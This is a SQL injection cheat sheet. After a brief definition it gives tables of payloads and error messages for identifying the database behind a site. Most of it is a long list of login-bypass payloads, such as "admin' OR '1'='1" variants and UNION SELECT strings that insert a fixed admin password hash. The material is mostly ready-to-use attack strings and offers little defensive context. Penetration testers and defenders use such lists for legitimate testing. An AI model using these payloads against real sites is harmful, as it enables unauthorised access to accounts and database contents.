SQL Injection
SQL Injection (SQLi) is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. SQL Injection is one of the most common and severe types of web application vulnerabilities, enabling attackers to execute arbitrary SQL code on the database. This can lead to unauthorized data access, data manipulation, and, in some cases, full compromise of the database server.
DBMS Identification
Certain SQL keywords are specific to particular database management systems (DBMS). By using these keywords in SQL injection attempts and observing how the website responds, you can often determine the type of DBMS in use.
| DBMS | SQL Payload |
|---|---|
| MySQL | conv('a',16,2)=conv('a',16,2) |
| MySQL | connection_id()=connection_id() |
| MySQL | crc32('MySQL')=crc32('MySQL') |
| MSSQL | BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123) |
| MSSQL | @@CONNECTIONS>0 |
| MSSQL | @@CONNECTIONS=@@CONNECTIONS |
| MSSQL | @@CPU_BUSY=@@CPU_BUSY |
| MSSQL | USER_ID(1)=USER_ID(1) |
| ORACLE | ROWNUM=ROWNUM |
| ORACLE | RAWTOHEX('AB')=RAWTOHEX('AB') |
| ORACLE | LNNVL(0=123) |
| POSTGRESQL | 5::int=5 |
| POSTGRESQL | 5::integer=5 |
| POSTGRESQL | pg_client_encoding()=pg_client_encoding() |
| POSTGRESQL | get_current_ts_config()=get_current_ts_config() |
| POSTGRESQL | quote_literal(42.5)=quote_literal(42.5) |
| POSTGRESQL | current_database()=current_database() |
| SQLITE | sqlite_version()=sqlite_version() |
| SQLITE | last_insert_rowid()>1 |
| SQLITE | last_insert_rowid()=last_insert_rowid() |
| MSACCESS | val(cvar(1))=1 |
| MSACCESS | IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0 |
DBMS Identification Error Based
Different DBMSs return distinct error messages when they encounter issues. By triggering errors and examining the specific messages sent back by the database, you can often identify the type of DBMS the website is using.
| DBMS | Example Error Message | Example Payload |
|---|---|---|
| MySQL | You have an error in your SQL syntax; ... near '' at line 1 | ' |
| PostgreSQL | ERROR: unterminated quoted string at or near "'" | ' |
| PostgreSQL | ERROR: syntax error at or near "1" | 1' |
| Microsoft SQL Server | Unclosed quotation mark after the character string ''. | ' |
| Microsoft SQL Server | Incorrect syntax near ''. | ' |
| Microsoft SQL Server | The conversion of the varchar value to data type int resulted in an out-of-range value. | 1' |
| Oracle | ORA-00933: SQL command not properly ended | ' |
| Oracle | ORA-01756: quoted string not properly terminated | ' |
| Oracle | ORA-00923: FROM keyword not found where expected | 1' |
Auth Payloads
admin' OR '1'='1
admin' OR 1=1
admin" OR "1"="1
admin" OR 1=1
' OR '1'='1
' OR 1=1
" OR "1"="1
" OR 1=1
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1' or 1.e(1) or '1'='1
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055